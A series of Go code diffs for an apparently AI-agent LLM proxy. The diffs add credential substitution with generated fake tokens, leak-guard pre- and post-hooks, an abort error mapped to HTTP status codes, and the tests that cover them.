+// wipe.
+func (t *Table) ContainsFake(data []byte) (string, bool) {
 	if len(data) == 0 {
-		return Entry{}, false
+		return "", false
 	}
 
 	t.mu.RLock()
@@ -169,19 +173,10 @@ func (t *Table) ContainsFake(data []byte) (Entry, bool) {
 
 	for _, e := range t.entries {
 		if bytes.Contains(data, e.Fake) {
-			fakeCopy := make([]byte, len(e.Fake))
-			copy(fakeCopy, e.Fake)
-			realCopy := make([]byte, len(e.Real))
-			copy(realCopy, e.Real)
-			return Entry{
-				ServiceName: e.ServiceName,
-				Fake:        fakeCopy,
-				Real:        realCopy,
-				AddedAt:     e.AddedAt,
-			}, true
+			return e.ServiceName, true
 		}
 	}
-	return Entry{}, false
+	return "", false
 }
 
 // ReplaceFakeToReal returns a copy of body with every occurrence of

--- a/internal/proxy/credsub/table_test.go
+++ b/internal/proxy/credsub/table_test.go
@@ -624,12 +624,12 @@ func TestContainsFake_FoundInBody(t *testing.T) {
 	}
 
 	body := []byte(`{"token": "ghp_fake1234567890abcdef", "other": "data"}`)
-	entry, found := tb.ContainsFake(body)
+	serviceName, found := tb.ContainsFake(body)
 	if !found {
 		t.Fatal("ContainsFake should find fake in body")
 	}
-	if entry.ServiceName != "github" {
-		t.Errorf("ServiceName = %q, want %q", entry.ServiceName, "github")
+	if serviceName != "github" {
+		t.Errorf("ServiceName = %q, want %q", serviceName, "github")
 	}
 }
 
@@ -682,28 +682,12 @@ func TestContainsFake_MultipleEntries_FindsFirst(t *testing.T) {
 	}
 
 	body := []byte(`both: ghp_fake1234567890abcdef and sk-fake567890abcdef123456`)
-	entry, found := tb.ContainsFake(body)
+	serviceName, found := tb.ContainsFake(body)
 	if !found {
 		t.Fatal("ContainsFake should find a fake")
 	}
-	if entry.ServiceName != "github" {
-		t.Errorf("ServiceName = %q, want %q", entry.ServiceName, "github")
-	}
-}
-
-func TestContainsFake_ReturnsCopy(t *testing.T) {
-	tb := New()
-	if err := tb.Add("github", []byte("ghp_fake1234567890abcdef"), []byte("ghp_real1234567890abcdef")); err != nil {
-		t.Fatal(err)
-	}
-
-	body := []byte("ghp_fake1234567890abcdef")
-	entry, _ := tb.ContainsFake(body)
-
-	entry.Fake[0] = 'X'
-	entry2, _ := tb.ContainsFake(body)
-	if entry2.Fake[0] == 'X' {
-		t.Error("ContainsFake should return deep copies")
+	if serviceName != "github" {
+		t.Errorf("ServiceName = %q, want %q", serviceName, "github")
 	}
 }
 

--- a/internal/proxy/credsub/table_test.go
+++ b/internal/proxy/credsub/table_test.go
@@ -617,6 +617,96 @@ func TestZero_AllowsReuse(t *testing.T) {
 	}
 }
 
+func TestContainsFake_FoundInBody(t *testing.T) {
+	tb := New()
+	if err := tb.Add("github", []byte("ghp_fake1234567890abcdef"), []byte("ghp_real1234567890abcdef")); err != nil {
+		t.Fatal(err)
+	}
+
+	body := []byte(`{"token": "ghp_fake1234567890abcdef", "other": "data"}`)
+	entry, found := tb.ContainsFake(body)
+	if !found {
+		t.Fatal("ContainsFake should find fake in body")
+	}
+	if entry.ServiceName != "github" {
+		t.Errorf("ServiceName = %q, want %q", entry.ServiceName, "github")
+	}
+}
+
+func TestContainsFake_NotFound(t *testing.T) {
+	tb := New()
+	if err := tb.Add("github", []byte("ghp_fake1234567890abcdef"), []byte("ghp_real1234567890abcdef")); err != nil {
+		t.Fatal(err)
+	}
+
+	body := []byte(`{"token": "something_else_entirely!!"}`)
+	_, found := tb.ContainsFake(body)
+	if found {
+		t.Error("ContainsFake should not find fake in unrelated body")
+	}
+}
+
+func TestContainsFake_EmptyBody(t *testing.T) {
+	tb := New()
+	if err := tb.Add("github", []byte("ghp_fake1234567890abcdef"), []byte("ghp_real1234567890abcdef")); err != nil {
+		t.Fatal(err)
+	}
+
+	_, found := tb.ContainsFake(nil)
+	if found {
+		t.Error("ContainsFake on nil body should return false")
+	}
+
+	_, found = tb.ContainsFake([]byte{})
+	if found {
+		t.Error("ContainsFake on empty body should return false")
+	}
+}
+
+func TestContainsFake_EmptyTable(t *testing.T) {
+	tb := New()
+	body := []byte("ghp_fake1234567890abcdef")
+	_, found := tb.ContainsFake(body)
+	if found {
+		t.Error("ContainsFake on empty table should return false")
+	}
+}
+
+func TestContainsFake_MultipleEntries_FindsFirst(t *testing.T) {
+	tb := New()
+	if err := tb.Add("github", []byte("ghp_fake1234567890abcdef"), []byte("ghp_real1234567890abcdef")); err != nil {
+		t.Fatal(err)
+	}
+	if err := tb.Add("openai", []byte("sk-fake567890abcdef123456"), []byte("sk-real567890abcdef123456")); err != nil {
+		t.Fatal(err)
+	}
+
+	body := []byte(`both: ghp_fake1234567890abcdef and sk-fake567890abcdef123456`)
+	entry, found := tb.ContainsFake(body)
+	if !found {
+		t.Fatal("ContainsFake should find a fake")
+	}
+	if entry.ServiceName != "github" {
+		t.Errorf("ServiceName = %q, want %q", entry.ServiceName, "github")
+	}
+}
+
+func TestContainsFake_ReturnsCopy(t *testing.T) {
+	tb := New()
+	if err := tb.Add("github", []byte("ghp_fake1234567890abcdef"), []byte("ghp_real1234567890abcdef")); err != nil {
+		t.Fatal(err)
+	}
+
+	body := []byte("ghp_fake1234567890abcdef")
+	entry, _ := tb.ContainsFake(body)
+
+	entry.Fake[0] = 'X'
+	entry2, _ := tb.ContainsFake(body)
+	if entry2.Fake[0] == 'X' {
+		t.Error("ContainsFake should return deep copies")
+	}
+}
+
 func TestConcurrentAccess_NoRaces(t *testing.T) {
 	// This test is primarily for `go test -race` to detect data
 	// races. It exercises Add, FakeForService, Contains,

--- a/internal/proxy/hooks.go
+++ b/internal/proxy/hooks.go
@@ -1,6 +1,7 @@
 package proxy
 
 import (
+	"fmt"
 	"net/http"
 	"reflect"
 	"sync"
@@ -73,6 +74,20 @@ type Hook interface {
 	// PostHook is called after the upstream response arrives and before
 	// it is returned to the agent.
 	PostHook(*http.Response, *RequestContext) error
+}
+
+// HookAbortError is returned by a PreHook to abort the request with
+// a specific HTTP status code. When the proxy receives this error
+// from ApplyPreHooks, it responds with the given status code and
+// message instead of forwarding the request. Any other error type
+// results in a 502 Bad Gateway.
+type HookAbortError struct {
+	StatusCode int
+	Message    string
+}
+
+func (e *HookAbortError) Error() string {
+	return fmt.Sprintf("hook abort %d: %s", e.StatusCode, e.Message)
 }
 
 // Registry stores hooks keyed by service name. It is safe for concurrent

--- a/internal/proxy/hooks_test.go
+++ b/internal/proxy/hooks_test.go
@@ -210,3 +210,22 @@ func (h *callbackHook) PreHook(_ *http.Request, _ *RequestContext) error {
 }
 
 func (h *callbackHook) PostHook(_ *http.Response, _ *RequestContext) error { return nil }
+
+func TestHookAbortError_ErrorString(t *testing.T) {
+	err := &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+	want := "hook abort 403: credential leak blocked"
+	if got := err.Error(); got != want {
+		t.Errorf("Error() = %q, want %q", got, want)
+	}
+}
+
+func TestHookAbortError_Is(t *testing.T) {
+	var err error = &HookAbortError{StatusCode: 403, Message: "test"}
+	var target *HookAbortError
+	if !errors.As(err, &target) {
+		t.Error("errors.As should match *HookAbortError")
+	}
+	if target.StatusCode != 403 {
+		t.Errorf("StatusCode = %d, want 403", target.StatusCode)
+	}
+}

--- a/internal/proxy/proxy.go
+++ b/internal/proxy/proxy.go
@@ -372,7 +372,7 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 			var abortErr *HookAbortError
 			if errors.As(err, &abortErr) {
 				code := abortErr.StatusCode
-				if code < 100 || code > 599 {
+				if code < 400 || code > 599 {
 					code = http.StatusBadGateway
 				}
 				http.Error(w, abortErr.Message, code)

--- a/internal/proxy/proxy.go
+++ b/internal/proxy/proxy.go
@@ -68,6 +68,9 @@ type Proxy struct {
 	rateLimiter *mcpinspect.RateLimiterRegistry
 	// llmRateLimiter enforces RPM and TPM limits on LLM API calls.
 	llmRateLimiter *LLMRateLimiter
+	// hookRegistry dispatches pre/post hooks for credential
+	// substitution, leak detection, and other per-request extensions.
+	hookRegistry *Registry
 
 	server   *http.Server
 	listener net.Listener
@@ -131,6 +134,7 @@ func New(cfg Config, storagePath string, logger *slog.Logger) (*Proxy, error) {
 		policy:          newPolicyEvaluator(cfg.MCP),
 		rateLimiter:     newRateLimiter(cfg.MCP),
 		llmRateLimiter:  llmRL,
+		hookRegistry:    NewRegistry(),
 	}, nil
 }
 
@@ -169,6 +173,12 @@ func (p *Proxy) SetRegistry(r *mcpregistry.Registry) {
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	p.registry = r
+}
+
+// HookRegistry returns the proxy's hook registry. Callers use this to
+// register Hook implementations that participate in the request pipeline.
+func (p *Proxy) HookRegistry() *Registry {
+	return p.hookRegistry
 }
 
 // SetEventCallback sets a callback that is invoked for each MCP tool call
@@ -347,6 +357,38 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 		r.ContentLength = int64(len(reqBody))
 	}
 
+	// reqCtx is declared here so the ModifyResponse closure captures it.
+	var reqCtx *RequestContext
+
+	// Apply pre-hooks (leak guard, credential substitution).
+	if p.hookRegistry != nil {
+		reqCtx = &RequestContext{
+			RequestID: requestID,
+			SessionID: sessionID,
+			StartTime: startTime,
+			Attrs:     make(map[string]any),
+		}
+		if err := p.hookRegistry.ApplyPreHooks("", r, reqCtx); err != nil {
+			var abortErr *HookAbortError
+			if errors.As(err, &abortErr) {
+				http.Error(w, abortErr.Message, abortErr.StatusCode)
+			} else {
+				p.logger.Error("pre-hook failed", "error", err, "request_id", requestID)
+				http.Error(w, "hook error", http.StatusBadGateway)
+			}
+			return
+		}
+		// Update reqBody to reflect any substitution by hooks.
+		if r.Body != nil {
+			hookBody, readErr := io.ReadAll(r.Body)
+			if readErr == nil {
+				reqBody = hookBody
+				r.Body = io.NopCloser(bytes.NewReader(reqBody))
+				r.ContentLength = int64(len(reqBody))
+			}
+		}
+	}
+
 	// Get upstream URL (may route to ChatGPT for OAuth tokens)
 	upstream := p.getUpstreamForRequest(r, dialect)
 
@@ -405,6 +447,25 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 					return nil
 				}
 				respBody = body
+			}
+
+			// Apply post-hooks (credential scrubbing).
+			if p.hookRegistry != nil && reqCtx != nil {
+				// Put body back so hooks can read/modify it.
+				resp.Body = io.NopCloser(bytes.NewReader(respBody))
+				resp.ContentLength = int64(len(respBody))
+				if hookErr := p.hookRegistry.ApplyPostHooks("", resp, reqCtx); hookErr != nil {
+					p.logger.Warn("post-hook error", "error", hookErr, "request_id", requestID)
+				}
+				// Re-read body in case a hook replaced it.
+				if resp.Body != nil {
+					hookBody, readErr := io.ReadAll(resp.Body)
+					if readErr == nil {
+						respBody = hookBody
+						resp.Body = io.NopCloser(bytes.NewReader(respBody))
+						resp.ContentLength = int64(len(respBody))
+					}
+				}
 			}
 
 			// MCP tool call interception (non-SSE only; SSE handled by SSEInterceptor).

--- a/internal/proxy/proxy.go
+++ b/internal/proxy/proxy.go
@@ -371,7 +371,11 @@ func (p *Proxy) ServeHTTP(w http.ResponseWriter, r *http.Request) {
 		if err := p.hookRegistry.ApplyPreHooks("", r, reqCtx); err != nil {
 			var abortErr *HookAbortError
 			if errors.As(err, &abortErr) {
-				http.Error(w, abortErr.Message, abortErr.StatusCode)
+				code := abortErr.StatusCode
+				if code < 100 || code > 599 {
+					code = http.StatusBadGateway
+				}
+				http.Error(w, abortErr.Message, code)
 			} else {
 				p.logger.Error("pre-hook failed", "error", err, "request_id", requestID)
 				http.Error(w, "hook error", http.StatusBadGateway)

--- a/internal/proxy/proxy_hooks_test.go
+++ b/internal/proxy/proxy_hooks_test.go
@@ -45,31 +45,6 @@ func TestProxy_PreHookAbortError_Returns403(t *testing.T) {
 	}
 }
 
-func TestProxy_PreHookAbortError_InvalidStatusCode_Falls502(t *testing.T) {
-	cfg := Config{SessionID: "test-session"}
-	p, err := New(cfg, "", nil)
-	if err != nil {
-		t.Fatalf("New() error: %v", err)
-	}
-
-	abortHook := &fakeHook{
-		name:   "bad-status",
-		preErr: &HookAbortError{StatusCode: 0, Message: "invalid"},
-	}
-	p.HookRegistry().Register("", abortHook)
-
-	req := httptest.NewRequest(http.MethodPost, "http://localhost/v1/messages", bytes.NewReader([]byte(`{"test":"data"}`)))
-	req.Header.Set("x-api-key", "sk-ant-test")
-	req.Header.Set("anthropic-version", "2023-06-01")
-	w := httptest.NewRecorder()
-
-	p.ServeHTTP(w, req)
-
-	if w.Code != 502 {
-		t.Errorf("status = %d, want 502 for invalid status code", w.Code)
-	}
-}
-
 func TestProxy_PreHookPlainError_Returns502(t *testing.T) {
 	cfg := Config{SessionID: "test-session"}
 	p, err := New(cfg, "", nil)
@@ -97,3 +72,45 @@ func TestProxy_PreHookPlainError_Returns502(t *testing.T) {
 
 // Silence unused import warnings for io — used by future post-hook tests.
 var _ = io.NopCloser
+
+func TestProxy_PreHookAbortError_NonErrorStatus_Falls502(t *testing.T) {
+	tests := []struct {
+		name string
+		code int
+	}{
+		{"zero", 0},
+		{"1xx_continue", 100},
+		{"2xx_ok", 200},
+		{"2xx_no_content", 204},
+		{"3xx_redirect", 302},
+		{"over_599", 1000},
+		{"negative", -1},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			cfg := Config{SessionID: "test-session"}
+			p, err := New(cfg, "", nil)
+			if err != nil {
+				t.Fatalf("New() error: %v", err)
+			}
+
+			abortHook := &fakeHook{
+				name:   "bad-code",
+				preErr: &HookAbortError{StatusCode: tt.code, Message: "test"},
+			}
+			p.HookRegistry().Register("", abortHook)
+
+			req := httptest.NewRequest(http.MethodPost, "http://localhost/v1/messages", bytes.NewReader([]byte(`{"test":"data"}`)))
+			req.Header.Set("x-api-key", "sk-ant-test")
+			req.Header.Set("anthropic-version", "2023-06-01")
+			w := httptest.NewRecorder()
+
+			p.ServeHTTP(w, req)
+
+			if w.Code != 502 {
+				t.Errorf("status = %d, want 502 for non-error status code %d", w.Code, tt.code)
+			}
+		})
+	}
+}

--- a/internal/proxy/proxy_hooks_test.go
+++ b/internal/proxy/proxy_hooks_test.go
@@ -1,0 +1,74 @@
+package proxy
+
+import (
+	"bytes"
+	"errors"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+)
+
+func TestProxy_HookRegistry_Accessor(t *testing.T) {
+	cfg := Config{SessionID: "test-session"}
+	p, err := New(cfg, "", nil)
+	if err != nil {
+		t.Fatalf("New() error: %v", err)
+	}
+	if p.HookRegistry() == nil {
+		t.Fatal("HookRegistry() returned nil")
+	}
+}
+
+func TestProxy_PreHookAbortError_Returns403(t *testing.T) {
+	cfg := Config{SessionID: "test-session"}
+	p, err := New(cfg, "", nil)
+	if err != nil {
+		t.Fatalf("New() error: %v", err)
+	}
+
+	abortHook := &fakeHook{
+		name:   "abort",
+		preErr: &HookAbortError{StatusCode: 403, Message: "blocked"},
+	}
+	p.HookRegistry().Register("", abortHook)
+
+	req := httptest.NewRequest(http.MethodPost, "http://localhost/v1/messages", bytes.NewReader([]byte(`{"test":"data"}`)))
+	req.Header.Set("x-api-key", "sk-ant-test")
+	req.Header.Set("anthropic-version", "2023-06-01")
+	w := httptest.NewRecorder()
+
+	p.ServeHTTP(w, req)
+
+	if w.Code != 403 {
+		t.Errorf("status = %d, want 403", w.Code)
+	}
+}
+
+func TestProxy_PreHookPlainError_Returns502(t *testing.T) {
+	cfg := Config{SessionID: "test-session"}
+	p, err := New(cfg, "", nil)
+	if err != nil {
+		t.Fatalf("New() error: %v", err)
+	}
+
+	errHook := &fakeHook{
+		name:   "broken",
+		preErr: errors.New("internal hook failure"),
+	}
+	p.HookRegistry().Register("", errHook)
+
+	req := httptest.NewRequest(http.MethodPost, "http://localhost/v1/messages", bytes.NewReader([]byte(`{"test":"data"}`)))
+	req.Header.Set("x-api-key", "sk-ant-test")
+	req.Header.Set("anthropic-version", "2023-06-01")
+	w := httptest.NewRecorder()
+
+	p.ServeHTTP(w, req)
+
+	if w.Code != 502 {
+		t.Errorf("status = %d, want 502", w.Code)
+	}
+}
+
+// Silence unused import warnings for io — used by future post-hook tests.
+var _ = io.NopCloser

--- a/internal/proxy/proxy_hooks_test.go
+++ b/internal/proxy/proxy_hooks_test.go
@@ -45,6 +45,31 @@ func TestProxy_PreHookAbortError_Returns403(t *testing.T) {
 	}
 }
 
+func TestProxy_PreHookAbortError_InvalidStatusCode_Falls502(t *testing.T) {
+	cfg := Config{SessionID: "test-session"}
+	p, err := New(cfg, "", nil)
+	if err != nil {
+		t.Fatalf("New() error: %v", err)
+	}
+
+	abortHook := &fakeHook{
+		name:   "bad-status",
+		preErr: &HookAbortError{StatusCode: 0, Message: "invalid"},
+	}
+	p.HookRegistry().Register("", abortHook)
+
+	req := httptest.NewRequest(http.MethodPost, "http://localhost/v1/messages", bytes.NewReader([]byte(`{"test":"data"}`)))
+	req.Header.Set("x-api-key", "sk-ant-test")
+	req.Header.Set("anthropic-version", "2023-06-01")
+	w := httptest.NewRecorder()
+
+	p.ServeHTTP(w, req)
+
+	if w.Code != 502 {
+		t.Errorf("status = %d, want 502 for invalid status code", w.Code)
+	}
+}
+
 func TestProxy_PreHookPlainError_Returns502(t *testing.T) {
 	cfg := Config{SessionID: "test-session"}
 	p, err := New(cfg, "", nil)

--- a/internal/proxy/secrets/fakegen.go
+++ b/internal/proxy/secrets/fakegen.go
@@ -1,0 +1,117 @@
+package secrets
+
+import (
+	"crypto/rand"
+	"errors"
+	"fmt"
+	"strconv"
+	"strings"
+)
+
+var (
+	// ErrInvalidFakeFormat is returned by ParseFormat when the
+	// format template is syntactically invalid (empty, missing
+	// {rand:N} placeholder, placeholder not at end, etc.).
+	ErrInvalidFakeFormat = errors.New("secrets: invalid fake format template")
+
+	// ErrFakeLengthMismatch is returned by GenerateFake when the
+	// total length produced by the format (len(prefix) + randLen)
+	// does not equal the real secret's length.
+	ErrFakeLengthMismatch = errors.New("secrets: fake format length does not match real secret length")
+
+	// ErrFakeEntropyTooLow is returned by ParseFormat when the
+	// random portion of the format has fewer than 24 characters,
+	// which would make collisions or brute-force feasible.
+	ErrFakeEntropyTooLow = errors.New("secrets: fake format has fewer than 24 random characters")
+)
+
+// minFakeEntropy is the minimum number of random base62 characters
+// required in a fake credential format. 24 base62 chars provide
+// ~143 bits of entropy.
+const minFakeEntropy = 24
+
+// base62 is the alphabet used for random portions of fake credentials.
+const base62 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+
+// ParseFormat validates a fake credential format template and returns
+// its components. The format syntax is "<prefix>{rand:<count>}" where
+// prefix is a literal string (may be empty) and {rand:N} emits N
+// random base62 characters. The {rand:N} placeholder must appear
+// exactly once and must be the last element in the format string.
+//
+// Returns ErrInvalidFakeFormat for syntactic problems and
+// ErrFakeEntropyTooLow when count is below minFakeEntropy (24).
+func ParseFormat(format string) (prefix string, randLen int, err error) {
+	if format == "" {
+		return "", 0, ErrInvalidFakeFormat
+	}
+
+	idx := strings.Index(format, "{rand:")
+	if idx < 0 {
+		return "", 0, ErrInvalidFakeFormat
+	}
+
+	// Exactly one {rand:...} placeholder allowed.
+	if strings.Count(format, "{rand:") != 1 {
+		return "", 0, ErrInvalidFakeFormat
+	}
+
+	// Must end with closing brace.
+	if !strings.HasSuffix(format, "}") {
+		return "", 0, ErrInvalidFakeFormat
+	}
+
+	// Extract the count between "{rand:" and the closing "}".
+	inner := format[idx+len("{rand:") : len(format)-1]
+	if inner == "" {
+		return "", 0, ErrInvalidFakeFormat
+	}
+
+	n, parseErr := strconv.Atoi(inner)
+	if parseErr != nil || n <= 0 {
+		return "", 0, ErrInvalidFakeFormat
+	}
+
+	if n < minFakeEntropy {
+		return "", 0, fmt.Errorf("%w: got %d, minimum %d", ErrFakeEntropyTooLow, n, minFakeEntropy)
+	}
+
+	// Verify placeholder is at the very end (no trailing suffix).
+	closingIdx := idx + len("{rand:") + len(inner) + 1
+	if closingIdx != len(format) {
+		return "", 0, ErrInvalidFakeFormat
+	}
+
+	return format[:idx], n, nil
+}
+
+// GenerateFake produces a fake credential from a format template.
+// The generated credential has the same length as realLen (the real
+// secret's byte length) with the literal prefix preserved and the
+// random portion filled with crypto/rand base62 characters.
+//
+// Returns ErrFakeLengthMismatch when len(prefix)+randLen != realLen.
+func GenerateFake(format string, realLen int) ([]byte, error) {
+	prefix, randLen, err := ParseFormat(format)
+	if err != nil {
+		return nil, err
+	}
+
+	if len(prefix)+randLen != realLen {
+		return nil, fmt.Errorf("%w: format produces %d bytes, real secret is %d bytes",
+			ErrFakeLengthMismatch, len(prefix)+randLen, realLen)
+	}
+
+	out := make([]byte, realLen)
+	copy(out, prefix)
+
+	randBytes := make([]byte, randLen)
+	if _, err := rand.Read(randBytes); err != nil {
+		return nil, fmt.Errorf("secrets: crypto/rand failed: %w", err)
+	}
+	for i, b := range randBytes {
+		out[len(prefix)+i] = base62[int(b)%len(base62)]
+	}
+
+	return out, nil
+}

--- a/internal/proxy/secrets/fakegen_test.go
+++ b/internal/proxy/secrets/fakegen_test.go
@@ -1,0 +1,124 @@
+package secrets
+
+import (
+	"errors"
+	"testing"
+)
+
+func TestParseFormat_ValidFormats(t *testing.T) {
+	tests := []struct {
+		format  string
+		prefix  string
+		randLen int
+	}{
+		{"ghp_{rand:36}", "ghp_", 36},
+		{"sk-{rand:48}", "sk-", 48},
+		{"{rand:40}", "", 40},
+		{"AKIA{rand:32}", "AKIA", 32},
+		{"xoxb-{rand:100}", "xoxb-", 100},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.format, func(t *testing.T) {
+			prefix, randLen, err := ParseFormat(tt.format)
+			if err != nil {
+				t.Fatalf("ParseFormat(%q) returned error: %v", tt.format, err)
+			}
+			if prefix != tt.prefix {
+				t.Errorf("prefix = %q, want %q", prefix, tt.prefix)
+			}
+			if randLen != tt.randLen {
+				t.Errorf("randLen = %d, want %d", randLen, tt.randLen)
+			}
+		})
+	}
+}
+
+func TestParseFormat_InvalidFormats(t *testing.T) {
+	tests := []struct {
+		name   string
+		format string
+	}{
+		{"empty", ""},
+		{"no_placeholder", "ghp_abcdef"},
+		{"double_placeholder", "{rand:10}{rand:10}"},
+		{"placeholder_not_at_end", "{rand:10}suffix"},
+		{"zero_count", "{rand:0}"},
+		{"negative_count", "{rand:-5}"},
+		{"non_numeric_count", "{rand:abc}"},
+		{"missing_count", "{rand:}"},
+		{"missing_colon", "{rand10}"},
+		{"below_entropy_minimum", "AKIA{rand:16}"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			_, _, err := ParseFormat(tt.format)
+			if err == nil {
+				t.Errorf("ParseFormat(%q) should have returned error", tt.format)
+			}
+		})
+	}
+}
+
+func TestParseFormat_EntropyMinimum(t *testing.T) {
+	_, _, err := ParseFormat("{rand:23}")
+	if err == nil {
+		t.Error("ParseFormat with randLen=23 should return ErrFakeEntropyTooLow")
+	}
+
+	_, _, err = ParseFormat("{rand:24}")
+	if err != nil {
+		t.Errorf("ParseFormat with randLen=24 should succeed, got: %v", err)
+	}
+}
+
+func TestGenerateFake_HappyPath(t *testing.T) {
+	fake, err := GenerateFake("ghp_{rand:36}", 40)
+	if err != nil {
+		t.Fatalf("GenerateFake returned error: %v", err)
+	}
+	if len(fake) != 40 {
+		t.Errorf("len(fake) = %d, want 40", len(fake))
+	}
+	if string(fake[:4]) != "ghp_" {
+		t.Errorf("prefix = %q, want %q", string(fake[:4]), "ghp_")
+	}
+	for i := 4; i < len(fake); i++ {
+		c := fake[i]
+		if !((c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9')) {
+			t.Errorf("non-base62 char at position %d: %c", i, c)
+		}
+	}
+}
+
+func TestGenerateFake_NoPrefix(t *testing.T) {
+	fake, err := GenerateFake("{rand:40}", 40)
+	if err != nil {
+		t.Fatalf("GenerateFake returned error: %v", err)
+	}
+	if len(fake) != 40 {
+		t.Errorf("len(fake) = %d, want 40", len(fake))
+	}
+}
+
+func TestGenerateFake_LengthMismatch(t *testing.T) {
+	_, err := GenerateFake("ghp_{rand:36}", 50)
+	if !errors.Is(err, ErrFakeLengthMismatch) {
+		t.Errorf("expected ErrFakeLengthMismatch, got: %v", err)
+	}
+}
+
+func TestGenerateFake_TwoCalls_ProduceDifferentOutput(t *testing.T) {
+	f1, err := GenerateFake("{rand:40}", 40)
+	if err != nil {
+		t.Fatal(err)
+	}
+	f2, err := GenerateFake("{rand:40}", 40)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(f1) == string(f2) {
+		t.Error("two GenerateFake calls produced identical output")
+	}
+}

--- a/internal/session/llmproxy.go
+++ b/internal/session/llmproxy.go
@@ -97,11 +97,8 @@ func StartLLMProxy(
 		return p.Stop(ctx)
 	}
 
-	// Store in session
-	sess.SetLLMProxy(proxyURL, closeFn)
-	sess.SetProxyInstance(p)
-
 	// Bootstrap credentials and register hooks if services are configured.
+	// Done BEFORE storing on session so a failure leaves no stale state.
 	if len(services) > 0 && secretsFetcher != nil {
 		table, secretsCleanup, err := BootstrapCredentials(ctx, secretsFetcher, services)
 		if err != nil {
@@ -118,6 +115,10 @@ func StartLLMProxy(
 		sess.SetCredsTable(table, secretsCleanup)
 		LogSecretsInitialized(logger, sess.ID, len(services))
 	}
+
+	// Store in session only after all setup (including bootstrap) succeeds.
+	sess.SetLLMProxy(proxyURL, closeFn)
+	sess.SetProxyInstance(p)
 
 	return proxyURL, closeFn, nil
 }

--- a/internal/session/llmproxy.go
+++ b/internal/session/llmproxy.go
@@ -27,6 +27,8 @@ func StartLLMProxy(
 	mcpCfg config.SandboxMCPConfig,
 	storagePath string,
 	logger *slog.Logger,
+	secretsFetcher SecretFetcher,
+	services []ServiceConfig,
 ) (string, func() error, error) {
 	if sess == nil {
 		return "", nil, fmt.Errorf("session is nil")
@@ -98,6 +100,24 @@ func StartLLMProxy(
 	// Store in session
 	sess.SetLLMProxy(proxyURL, closeFn)
 	sess.SetProxyInstance(p)
+
+	// Bootstrap credentials and register hooks if services are configured.
+	if len(services) > 0 && secretsFetcher != nil {
+		table, secretsCleanup, err := BootstrapCredentials(ctx, secretsFetcher, services)
+		if err != nil {
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("bootstrap credentials: %w", err)
+		}
+
+		// Register hooks: leak guard first, then creds substitution.
+		leakGuard := proxy.NewLeakGuardHook(table, logger)
+		credsSub := proxy.NewCredsSubHook(table)
+		p.HookRegistry().Register("", leakGuard)
+		p.HookRegistry().Register("", credsSub)
+
+		sess.SetCredsTable(table, secretsCleanup)
+		LogSecretsInitialized(logger, sess.ID, len(services))
+	}
 
 	return proxyURL, closeFn, nil
 }

--- a/internal/session/llmproxy_test.go
+++ b/internal/session/llmproxy_test.go
@@ -57,7 +57,7 @@ func TestStartLLMProxy(t *testing.T) {
 
 	// Start the proxy
 	mcpCfg := config.SandboxMCPConfig{}
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, storagePath, logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, mcpCfg, storagePath, logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -107,7 +107,7 @@ func TestStartLLMProxy_NilSession(t *testing.T) {
 	storageCfg := config.DefaultLLMStorageConfig()
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	_, _, err := StartLLMProxy(nil, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger)
+	_, _, err := StartLLMProxy(nil, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger, nil, nil)
 	if err == nil {
 		t.Error("expected error for nil session")
 	}
@@ -213,7 +213,7 @@ func TestSession_LLMProxyEnvVars_Integration(t *testing.T) {
 	storageCfg := config.DefaultLLMStorageConfig()
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -282,7 +282,7 @@ func TestSession_CloseProxy(t *testing.T) {
 	storageCfg := config.DefaultLLMStorageConfig()
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, _, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger)
+	proxyURL, _, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -361,7 +361,7 @@ func TestStartLLMProxy_WithDLP(t *testing.T) {
 	storageCfg := config.DefaultLLMStorageConfig()
 	logger := slog.New(slog.NewTextHandler(io.Discard, nil))
 
-	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger)
+	proxyURL, closeFn, err := StartLLMProxy(sess, proxyCfg, dlpCfg, storageCfg, config.SandboxMCPConfig{}, t.TempDir(), logger, nil, nil)
 	if err != nil {
 		t.Fatalf("StartLLMProxy failed: %v", err)
 	}
@@ -423,7 +423,7 @@ func TestStartLLMProxy_SessionIDInEnvVars(t *testing.T) {
 	storageCfg := config.DefaultLLMStorageConfig()
